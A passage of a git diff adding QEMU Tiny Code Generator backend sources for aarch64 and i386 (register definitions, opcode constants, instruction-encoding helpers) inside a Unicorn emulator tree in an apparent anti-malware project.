tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + +#if defined(CONFIG_USE_GUEST_BASE) + if (GUEST_BASE) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_GUEST_BASE, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_GUEST_BASE); + } +#endif + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tcg_out_insn(s, 3207, BR, tcg_target_call_iarg_regs[1]); + + tb_ret_addr = s->code_ptr; + + /* Remove TCG locals stack space. */ + tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, + FRAME_SIZE - PUSH_SIZE); + + /* Restore registers x19..x28. 
*/ + for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { + int ofs = (r - TCG_REG_X19 + 2) * 8; + tcg_out_insn(s, 3314, LDP, r, r + 1, TCG_REG_SP, ofs, 1, 0); + } + + /* Pop (FP, LR), restore SP to previous frame. */ + tcg_out_insn(s, 3314, LDP, TCG_REG_FP, TCG_REG_LR, + TCG_REG_SP, PUSH_SIZE, 0, 1); + tcg_out_insn(s, 3207, RET, TCG_REG_LR); +} + +#define ELF_HOST_MACHINE EM_AARCH64 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.h new file mode 100644 index 0000000..60c7493 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.h @@ -0,0 +1,107 @@ +/* + * Initial TCG Implementation for aarch64 + * + * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH + * Written by Claudio Fontana + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * (at your option) any later version. + * + * See the COPYING file in the top-level directory for details. + */ + +#ifndef TCG_TARGET_AARCH64 +#define TCG_TARGET_AARCH64 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 4 +#undef TCG_TARGET_STACK_GROWSUP + +typedef enum { + TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, + TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, + TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, + TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, + TCG_REG_X16, TCG_REG_X17, TCG_REG_X18, TCG_REG_X19, + TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, + TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, + TCG_REG_X28, TCG_REG_X29, TCG_REG_X30, + + /* X31 is either the stack pointer or zero, depending on context. */ + TCG_REG_SP = 31, + TCG_REG_XZR = 31, + + /* Aliases. 
*/ + TCG_REG_FP = TCG_REG_X29, + TCG_REG_LR = TCG_REG_X30, + TCG_AREG0 = TCG_REG_X19, +} TCGReg; + +#define TCG_TARGET_NB_REGS 32 + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_SP +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_CALL_ALIGN_ARGS 1 +#define TCG_TARGET_CALL_STACK_OFFSET 0 + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_eqv_i32 1 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 + +#define TCG_TARGET_HAS_div_i64 1 +#define TCG_TARGET_HAS_rem_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_eqv_i64 1 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 1 +#define 
TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 1 +#define TCG_TARGET_HAS_mulsh_i64 1 + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + __builtin___clear_cache((char *)start, (char *)stop); +} + +#endif /* TCG_TARGET_AARCH64 */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.c new file mode 100644 index 0000000..fefe85a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.c @@ -0,0 +1,2471 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ + +#include "tcg-be-ldst.h" + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { +#if TCG_TARGET_REG_BITS == 64 + "%rax", "%rcx", "%rdx", "%rbx", "%rsp", "%rbp", "%rsi", "%rdi", + "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%r15", +#else + "%eax", "%ecx", "%edx", "%ebx", "%esp", "%ebp", "%esi", "%edi", +#endif +}; +#endif + +static const int tcg_target_reg_alloc_order[] = { +#if TCG_TARGET_REG_BITS == 64 + TCG_REG_RBP, + TCG_REG_RBX, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R9, + TCG_REG_R8, + TCG_REG_RCX, + TCG_REG_RDX, + TCG_REG_RSI, + TCG_REG_RDI, + TCG_REG_RAX, +#else + TCG_REG_EBX, + TCG_REG_ESI, + TCG_REG_EDI, + TCG_REG_EBP, + TCG_REG_ECX, + TCG_REG_EDX, + TCG_REG_EAX, +#endif +}; + +static const int tcg_target_call_iarg_regs[] = { +#if TCG_TARGET_REG_BITS == 64 +#if (defined(_WIN64) || defined(__CYGWIN__)) + TCG_REG_RCX, + TCG_REG_RDX, +#else + TCG_REG_RDI, + TCG_REG_RSI, + TCG_REG_RDX, + TCG_REG_RCX, +#endif + TCG_REG_R8, + TCG_REG_R9, +#else +#ifdef _MSC_VER +#ifdef _UC_MSVC_ARRAY_DUMMY +#error "DUP DEF _UC_MSVC_ARRAY_DUMMY" +#endif +#define _UC_MSVC_ARRAY_DUMMY + /* 32 bit mode uses stack based calling convention (GCC default). + We add a dummy value here for MSVC compatibility for the error: + "error C2466: cannot allocate an array of constant size 0" + The "tcg_target_call_iarg_regs" array is not accessed when + TCG_TARGET_REG_BITS == 32 + */ + 0, +#endif +#endif +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_EAX, +#if TCG_TARGET_REG_BITS == 32 + TCG_REG_EDX +#endif +}; + +/* Constants we accept. */ +#define TCG_CT_CONST_S32 0x100 +#define TCG_CT_CONST_U32 0x200 +#define TCG_CT_CONST_I32 0x400 + +/* Registers used with L constraint, which are the first argument + registers on x86_64, and two random call clobbered registers on + i386. 
*/ +#if TCG_TARGET_REG_BITS == 64 +# define TCG_REG_L0 tcg_target_call_iarg_regs[0] +# define TCG_REG_L1 tcg_target_call_iarg_regs[1] +#else +# define TCG_REG_L0 TCG_REG_EAX +# define TCG_REG_L1 TCG_REG_EDX +#endif + +/* The host compiler should supply to enable runtime features + detection, as we're not going to go so far as our own inline assembly. + If not available, default values will be assumed. */ +#if defined(CONFIG_CPUID_H) +#ifdef _MSC_VER +#include +/* %ecx */ +#define bit_MOVBE (1 << 22) +/* %edx */ +#define bit_CMOV (1 << 15) +/* Extended Features (%eax == 7) */ +#define bit_BMI (1 << 3) +#define bit_BMI2 (1 << 8) +#else +#include +#endif +#endif + +/* For 32-bit, we are going to attempt to determine at runtime whether cmov + is available. */ +#if TCG_TARGET_REG_BITS == 64 +# define have_cmov 1 +#elif defined(CONFIG_CPUID_H) && defined(bit_CMOV) +static bool have_cmov; +#else +# define have_cmov 0 +#endif + +/* We need this symbol in tcg-target.h, and we can't properly conditionalize + it there. Therefore we always define the variable. 
*/ +bool have_bmi1; + +#if defined(CONFIG_CPUID_H) && defined(bit_BMI2) +static bool have_bmi2; +#else +static bool have_bmi2 = 0; +#endif + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + value += addend; + switch(type) { + case R_386_PC32: + value -= (uintptr_t)code_ptr; + if (value != (int32_t)value) { + tcg_abort(); + } + tcg_patch32(code_ptr, value); + break; + case R_386_PC8: + value -= (uintptr_t)code_ptr; + if (value != (int8_t)value) { + tcg_abort(); + } + tcg_patch8(code_ptr, value); + break; + default: + tcg_abort(); + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch(ct_str[0]) { + case 'a': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EAX); + break; + case 'b': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EBX); + break; + case 'c': + case_c: + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_ECX); + break; + case 'd': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EDX); + break; + case 'S': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_ESI); + break; + case 'D': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EDI); + break; + case 'q': + ct->ct |= TCG_CT_REG; + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(ct->u.regs, 0, 0xffff); + } else { + tcg_regset_set32(ct->u.regs, 0, 0xf); + } + break; + case 'Q': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xf); + break; + case 'r': + case_r: + ct->ct |= TCG_CT_REG; + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(ct->u.regs, 0, 0xffff); + } else { + tcg_regset_set32(ct->u.regs, 0, 0xff); + } + break; + case 'C': + /* With SHRX et al, we need not use ECX as shift count register. 
*/ + if (have_bmi2) { + goto case_r; + } else { + goto case_c; + } + + /* qemu_ld/st address constraint */ + case 'L': + ct->ct |= TCG_CT_REG; + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(ct->u.regs, 0, 0xffff); + } else { + tcg_regset_set32(ct->u.regs, 0, 0xff); + } + tcg_regset_reset_reg(ct->u.regs, TCG_REG_L0); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_L1); + break; + + case 'e': + ct->ct |= TCG_CT_CONST_S32; + break; + case 'Z': + ct->ct |= TCG_CT_CONST_U32; + break; + case 'I': + ct->ct |= TCG_CT_CONST_I32; + break; + + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + if (ct & TCG_CT_CONST) { + return 1; + } + if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { + return 1; + } + if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { + return 1; + } + if ((ct & TCG_CT_CONST_I32) && ~val == (int32_t)~val) { + return 1; + } + return 0; +} + +#if TCG_TARGET_REG_BITS == 64 +# define LOWREGMASK(x) ((x) & 7) +#else +# define LOWREGMASK(x) (x) +#endif + +#define P_EXT 0x100 /* 0x0f opcode prefix */ +#define P_EXT38 0x200 /* 0x0f 0x38 opcode prefix */ +#define P_DATA16 0x400 /* 0x66 opcode prefix */ +#if TCG_TARGET_REG_BITS == 64 +# define P_ADDR32 0x800 /* 0x67 opcode prefix */ +# define P_REXW 0x1000 /* Set REX.W = 1 */ +# define P_REXB_R 0x2000 /* REG field as byte register */ +# define P_REXB_RM 0x4000 /* R/M field as byte register */ +# define P_GS 0x8000 /* gs segment override */ +#else +# define P_ADDR32 0 +# define P_REXW 0 +# define P_REXB_R 0 +# define P_REXB_RM 0 +# define P_GS 0 +#endif +#define P_SIMDF3 0x10000 /* 0xf3 opcode prefix */ +#define P_SIMDF2 0x20000 /* 0xf2 opcode prefix */ + +#define OPC_ARITH_EvIz (0x81) +#define OPC_ARITH_EvIb (0x83) +#define OPC_ARITH_GvEv (0x03) /* ... 
plus (ARITH_FOO << 3) */ +#define OPC_ANDN (0xf2 | P_EXT38) +#define OPC_ADD_GvEv (OPC_ARITH_GvEv | (ARITH_ADD << 3)) +#define OPC_BSWAP (0xc8 | P_EXT) +#define OPC_CALL_Jz (0xe8) +#define OPC_CMOVCC (0x40 | P_EXT) /* ... plus condition code */ +#define OPC_CMP_GvEv (OPC_ARITH_GvEv | (ARITH_CMP << 3)) +#define OPC_DEC_r32 (0x48) +#define OPC_IMUL_GvEv (0xaf | P_EXT) +#define OPC_IMUL_GvEvIb (0x6b) +#define OPC_IMUL_GvEvIz (0x69) +#define OPC_INC_r32 (0x40) +#define OPC_JCC_long (0x80 | P_EXT) /* ... plus condition code */ +#define OPC_JCC_short (0x70) /* ... plus condition code */ +#define OPC_JMP_long (0xe9) +#define OPC_JMP_short (0xeb) +#define OPC_LEA (0x8d) +#define OPC_MOVB_EvGv (0x88) /* stores, more or less */ +#define OPC_MOVL_EvGv (0x89) /* stores, more or less */ +#define OPC_MOVL_GvEv (0x8b) /* loads, more or less */ +#define OPC_MOVB_EvIz (0xc6) +#define OPC_MOVL_EvIz (0xc7) +#define OPC_MOVL_Iv (0xb8) +#define OPC_MOVBE_GyMy (0xf0 | P_EXT38) +#define OPC_MOVBE_MyGy (0xf1 | P_EXT38) +#define OPC_MOVSBL (0xbe | P_EXT) +#define OPC_MOVSWL (0xbf | P_EXT) +#define OPC_MOVSLQ (0x63 | P_REXW) +#define OPC_MOVZBL (0xb6 | P_EXT) +#define OPC_MOVZWL (0xb7 | P_EXT) +#define OPC_POP_r32 (0x58) +#define OPC_PUSH_r32 (0x50) +#define OPC_PUSH_Iv (0x68) +#define OPC_PUSH_Ib (0x6a) +#define OPC_RET (0xc3) +#define OPC_SETCC (0x90 | P_EXT | P_REXB_RM) /* ... plus cc */ +#define OPC_SHIFT_1 (0xd1) +#define OPC_SHIFT_Ib (0xc1) +#define OPC_SHIFT_cl (0xd3) +#define OPC_SARX (0xf7 | P_EXT38 | P_SIMDF3) +#define OPC_SHLX (0xf7 | P_EXT38 | P_DATA16) +#define OPC_SHRX (0xf7 | P_EXT38 | P_SIMDF2) +#define OPC_TESTL (0x85) +#define OPC_XCHG_ax_r32 (0x90) + +#define OPC_GRP3_Ev (0xf7) +#define OPC_GRP5 (0xff) + +/* Group 1 opcode extensions for 0x80-0x83. + These are also used as modifiers for OPC_ARITH. 
*/ +#define ARITH_ADD 0 +#define ARITH_OR 1 +#define ARITH_ADC 2 +#define ARITH_SBB 3 +#define ARITH_AND 4 +#define ARITH_SUB 5 +#define ARITH_XOR 6 +#define ARITH_CMP 7 + +/* Group 2 opcode extensions for 0xc0, 0xc1, 0xd0-0xd3. */ +#define SHIFT_ROL 0 +#define SHIFT_ROR 1 +#define SHIFT_SHL 4 +#define SHIFT_SHR 5 +#define SHIFT_SAR 7 + +/* Group 3 opcode extensions for 0xf6, 0xf7. To be used with OPC_GRP3. */ +#define EXT3_NOT 2 +#define EXT3_NEG 3 +#define EXT3_MUL 4 +#define EXT3_IMUL 5 +#define EXT3_DIV 6 +#define EXT3_IDIV 7 + +/* Group 5 opcode extensions for 0xff. To be used with OPC_GRP5. */ +#define EXT5_INC_Ev 0 +#define EXT5_DEC_Ev 1 +#define EXT5_CALLN_Ev 2 +#define EXT5_JMPN_Ev 4 + +/* Condition codes to be added to OPC_JCC_{long,short}. */ +#define JCC_JMP (-1) +#define JCC_JO 0x0 +#define JCC_JNO 0x1 +#define JCC_JB 0x2 +#define JCC_JAE 0x3 +#define JCC_JE 0x4 +#define JCC_JNE 0x5 +#define JCC_JBE 0x6 +#define JCC_JA 0x7 +#define JCC_JS 0x8 +#define JCC_JNS 0x9 +#define JCC_JP 0xa +#define JCC_JNP 0xb +#define JCC_JL 0xc +#define JCC_JGE 0xd +#define JCC_JLE 0xe +#define JCC_JG 0xf + +static const uint8_t tcg_cond_to_jcc[] = { +#ifdef _MSC_VER + 0, // TCG_COND_NEVER + 0, // TCG_COND_ALWAYS + JCC_JL, // TCG_COND_LT + JCC_JGE, // TCG_COND_GE + JCC_JB, // TCG_COND_LTU + JCC_JAE, // TCG_COND_GEU + 0, // n/a + 0, // n/a + JCC_JE, // TCG_COND_EQ + JCC_JNE, // TCG_COND_NE + JCC_JLE, // TCG_COND_LE + JCC_JG, // TCG_COND_GT + JCC_JBE, // TCG_COND_LEU + JCC_JA, // TCG_COND_GTU + 0, // n/a + 0, // n/a +#else + [TCG_COND_EQ] = JCC_JE, + [TCG_COND_NE] = JCC_JNE, + [TCG_COND_LT] = JCC_JL, + [TCG_COND_GE] = JCC_JGE, + [TCG_COND_LE] = JCC_JLE, + [TCG_COND_GT] = JCC_JG, + [TCG_COND_LTU] = JCC_JB, + [TCG_COND_GEU] = JCC_JAE, + [TCG_COND_LEU] = JCC_JBE, + [TCG_COND_GTU] = JCC_JA, +#endif +}; + +#if TCG_TARGET_REG_BITS == 64 +static void tcg_out_opc(TCGContext *s, int opc, int r, int rm, int x) +{ + int rex; + + if (opc & P_GS) { + tcg_out8(s, 0x65); + } + if (opc & 
P_DATA16) { + /* We should never be asking for both 16 and 64-bit operation. */ + assert((opc & P_REXW) == 0); + tcg_out8(s, 0x66); + } + if (opc & P_ADDR32) { + tcg_out8(s, 0x67); + } + + rex = 0; + rex |= (opc & P_REXW) ? 0x8 : 0x0; /* REX.W */ + rex |= (r & 8) >> 1; /* REX.R */ + rex |= (x & 8) >> 2; /* REX.X */ + rex |= (rm & 8) >> 3; /* REX.B */ + + /* P_REXB_{R,RM} indicates that the given register is the low byte. + For %[abcd]l we need no REX prefix, but for %{si,di,bp,sp}l we do, + as otherwise the encoding indicates %[abcd]h. Note that the values + that are ORed in merely indicate that the REX byte must be present; + those bits get discarded in output. */ + rex |= opc & (r >= 4 ? P_REXB_R : 0); + rex |= opc & (rm >= 4 ? P_REXB_RM : 0); + + if (rex) { + tcg_out8(s, (uint8_t)(rex | 0x40)); + } + + if (opc & (P_EXT | P_EXT38)) { + tcg_out8(s, 0x0f); + if (opc & P_EXT38) { + tcg_out8(s, 0x38); + } + } + + tcg_out8(s, opc); +} +#else +static void tcg_out_opc(TCGContext *s, int opc) +{ + if (opc & P_DATA16) { + tcg_out8(s, 0x66); + } + if (opc & (P_EXT | P_EXT38)) { + tcg_out8(s, 0x0f); + if (opc & P_EXT38) { + tcg_out8(s, 0x38); + } + } + tcg_out8(s, opc); +} +/* Discard the register arguments to tcg_out_opc early, so as not to penalize + the 32-bit compilation paths. This method works with all versions of gcc, + whereas relying on optimization may not be able to exclude them. */ +#define tcg_out_opc(s, opc, r, rm, x) (tcg_out_opc)(s, opc) +#endif + +static void tcg_out_modrm(TCGContext *s, int opc, int r, int rm) +{ + tcg_out_opc(s, opc, r, rm, 0); + tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); +} + +static void tcg_out_vex_modrm(TCGContext *s, int opc, int r, int v, int rm) +{ + int tmp; + + if ((opc & (P_REXW | P_EXT | P_EXT38)) || (rm & 8)) { + /* Three byte VEX prefix. 
*/ + tcg_out8(s, 0xc4); + + /* VEX.m-mmmm */ + if (opc & P_EXT38) { + tmp = 2; + } else if (opc & P_EXT) { + tmp = 1; + } else { + tcg_abort(); + } + tmp |= 0x40; /* VEX.X */ + tmp |= (r & 8 ? 0 : 0x80); /* VEX.R */ + tmp |= (rm & 8 ? 0 : 0x20); /* VEX.B */ + tcg_out8(s, tmp); + + tmp = (opc & P_REXW ? 0x80 : 0); /* VEX.W */ + } else { + /* Two byte VEX prefix. */ + tcg_out8(s, 0xc5); + + tmp = (r & 8 ? 0 : 0x80); /* VEX.R */ + } + /* VEX.pp */ + if (opc & P_DATA16) { + tmp |= 1; /* 0x66 */ + } else if (opc & P_SIMDF3) { + tmp |= 2; /* 0xf3 */ + } else if (opc & P_SIMDF2) { + tmp |= 3; /* 0xf2 */ + } + tmp |= (~v & 15) << 3; /* VEX.vvvv */ + tcg_out8(s, tmp); + tcg_out8(s, opc); + tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); +} + +/* Output an opcode with a full "rm + (index<code_ptr + 5 + ~rm; + intptr_t disp = offset - pc; + if (disp == (int32_t)disp) { + tcg_out_opc(s, opc, r, 0, 0); + tcg_out8(s, (LOWREGMASK(r) << 3) | 5); + tcg_out32(s, disp); + return; + } + + /* Try for an absolute address encoding. This requires the + use of the MODRM+SIB encoding and is therefore larger than + rip-relative addressing. */ + if (offset == (int32_t)offset) { + tcg_out_opc(s, opc, r, 0, 0); + tcg_out8(s, (LOWREGMASK(r) << 3) | 4); + tcg_out8(s, (4 << 3) | 5); + tcg_out32(s, offset); + return; + } + + /* ??? The memory isn't directly addressable. */ + tcg_abort(); + } else { + /* Absolute address. */ + tcg_out_opc(s, opc, r, 0, 0); + tcg_out8(s, (r << 3) | 5); + tcg_out32(s, offset); + return; + } + } + + /* Find the length of the immediate addend. Note that the encoding + that would be used for (%ebp) indicates absolute addressing. */ + if (rm < 0) { + mod = 0, len = 4, rm = 5; + } else if (offset == 0 && LOWREGMASK(rm) != TCG_REG_EBP) { + mod = 0, len = 0; + } else if (offset == (int8_t)offset) { + mod = 0x40, len = 1; + } else { + mod = 0x80, len = 4; + } + + /* Use a single byte MODRM format if possible. 
Note that the encoding + that would be used for %esp is the escape to the two byte form. */ + if (index < 0 && LOWREGMASK(rm) != TCG_REG_ESP) { + /* Single byte MODRM format. */ + tcg_out_opc(s, opc, r, rm, 0); + tcg_out8(s, mod | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); + } else { + /* Two byte MODRM+SIB format. */ + + /* Note that the encoding that would place %esp into the index + field indicates no index register. In 64-bit mode, the REX.X + bit counts, so %r12 can be used as the index. */ + if (index < 0) { + index = 4; + } else { + assert(index != TCG_REG_ESP); + } + + tcg_out_opc(s, opc, r, rm, index); + tcg_out8(s, mod | (LOWREGMASK(r) << 3) | 4); + tcg_out8(s, (shift << 6) | (LOWREGMASK(index) << 3) | LOWREGMASK(rm)); + } + + if (len == 1) { + tcg_out8(s, offset); + } else if (len == 4) { + tcg_out32(s, offset); + } +} + +/* A simplification of the above with no index or shift. */ +static inline void tcg_out_modrm_offset(TCGContext *s, int opc, int r, + int rm, intptr_t offset) +{ + tcg_out_modrm_sib_offset(s, opc, r, rm, -1, 0, offset); +} + +/* Generate dest op= src. Uses the same ARITH_* codes as tgen_arithi. */ +static inline void tgen_arithr(TCGContext *s, int subop, int dest, int src) +{ + /* Propagate an opcode prefix, such as P_REXW. */ + int ext = subop & ~0x7; + subop &= 0x7; + + tcg_out_modrm(s, OPC_ARITH_GvEv + (subop << 3) + ext, dest, src); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + if (arg != ret) { + int opc = OPC_MOVL_GvEv + (type == TCG_TYPE_I64 ? 
P_REXW : 0); + tcg_out_modrm(s, opc, ret, arg); + } +} + +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long arg) +{ + tcg_target_long diff; + + if (arg == 0) { + tgen_arithr(s, ARITH_XOR, ret, ret); + return; + } + if (arg == (uint32_t)arg || type == TCG_TYPE_I32) { + tcg_out_opc(s, OPC_MOVL_Iv + LOWREGMASK(ret), 0, ret, 0); + tcg_out32(s, arg); + return; + } + if (arg == (int32_t)arg) { + tcg_out_modrm(s, OPC_MOVL_EvIz + P_REXW, 0, ret); + tcg_out32(s, arg); + return; + } + + /* Try a 7 byte pc-relative lea before the 10 byte movq. */ + diff = arg - ((uintptr_t)s->code_ptr + 7); + if (diff == (int32_t)diff) { + tcg_out_opc(s, OPC_LEA | P_REXW, ret, 0, 0); + tcg_out8(s, (LOWREGMASK(ret) << 3) | 5); + tcg_out32(s, diff); + return; + } + + tcg_out_opc(s, OPC_MOVL_Iv + P_REXW + LOWREGMASK(ret), 0, ret, 0); + tcg_out64(s, arg); +} + +static inline void tcg_out_pushi(TCGContext *s, tcg_target_long val) +{ + if (val == (int8_t)val) { + tcg_out_opc(s, OPC_PUSH_Ib, 0, 0, 0); + tcg_out8(s, val); + } else if (val == (int32_t)val) { + tcg_out_opc(s, OPC_PUSH_Iv, 0, 0, 0); + tcg_out32(s, val); + } else { + tcg_abort(); + } +} + +static inline void tcg_out_push(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_PUSH_r32 + LOWREGMASK(reg), 0, reg, 0); +} + +static inline void tcg_out_pop(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_POP_r32 + LOWREGMASK(reg), 0, reg, 0); +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, + TCGReg arg1, intptr_t arg2) +{ + int opc = OPC_MOVL_GvEv + (type == TCG_TYPE_I64 ? P_REXW : 0); + tcg_out_modrm_offset(s, opc, ret, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + int opc = OPC_MOVL_EvGv + (type == TCG_TYPE_I64 ? 
P_REXW : 0); + tcg_out_modrm_offset(s, opc, arg, arg1, arg2); +} + +static inline void tcg_out_sti(TCGContext *s, TCGType type, TCGReg base, + tcg_target_long ofs, tcg_target_long val) +{ + int opc = OPC_MOVL_EvIz + (type == TCG_TYPE_I64 ? P_REXW : 0); + tcg_out_modrm_offset(s, opc, 0, base, ofs); + tcg_out32(s, val); +} + +static void tcg_out_shifti(TCGContext *s, int subopc, int reg, int count) +{ + /* Propagate an opcode prefix, such as P_DATA16. */ + int ext = subopc & ~0x7; + subopc &= 0x7; + + if (count == 1) { + tcg_out_modrm(s, OPC_SHIFT_1 + ext, subopc, reg); + } else { + tcg_out_modrm(s, OPC_SHIFT_Ib + ext, subopc, reg); + tcg_out8(s, count); + } +} + +static inline void tcg_out_bswap32(TCGContext *s, int reg) +{ + tcg_out_opc(s, OPC_BSWAP + LOWREGMASK(reg), 0, reg, 0); +} + +static inline void tcg_out_rolw_8(TCGContext *s, int reg) +{ + tcg_out_shifti(s, SHIFT_ROL + P_DATA16, reg, 8); +} + +static inline void tcg_out_ext8u(TCGContext *s, int dest, int src) +{ + /* movzbl */ + assert(src < 4 || TCG_TARGET_REG_BITS == 64); + tcg_out_modrm(s, OPC_MOVZBL + P_REXB_RM, dest, src); +} + +static void tcg_out_ext8s(TCGContext *s, int dest, int src, int rexw) +{ + /* movsbl */ + assert(src < 4 || TCG_TARGET_REG_BITS == 64); + tcg_out_modrm(s, OPC_MOVSBL + 